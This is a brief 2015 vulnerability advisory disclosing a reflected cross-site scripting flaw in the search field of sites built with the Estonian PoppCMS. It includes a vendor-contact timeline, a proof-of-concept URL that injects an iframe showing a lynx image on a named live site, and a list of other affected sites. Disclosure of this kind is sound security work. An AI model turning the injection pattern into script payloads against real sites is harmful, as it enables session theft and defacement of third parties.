0. Timeline
0.0 Discovery: 2015.08.25
0.1.1 Sent First Report: 2015.08.25
0.1.2 Ack from vendor: 2015.08.28
0.2 Disclosure: 2015.10.05

1. Background
PoppCMS is a closed source HTML content creation/management solution from Estonia[0].

2. Problem
Sites created with PoppCMS have XSS[1] on search field.

3. Proof of Concept (PoC) Code
http://www.byroomaailm.ee/otsing?searchword=%22/%3E%3Ciframe%20src=http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/Lynx_lynx_poing.jpg/240px-Lynx_lynx_poing.jpg%3E%3C/iframe%3E opens up byroomaailm.ee with picture of lynxs inside iframe from site wikimedia.org.

4. Not an Exhaustive List of Affected Sites
betoneks.ee, estsporthorse.ee, koduspaa.ee

5. References
[0] www.poppworks.ee redirects to http://www.websystems.ee/
[1] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29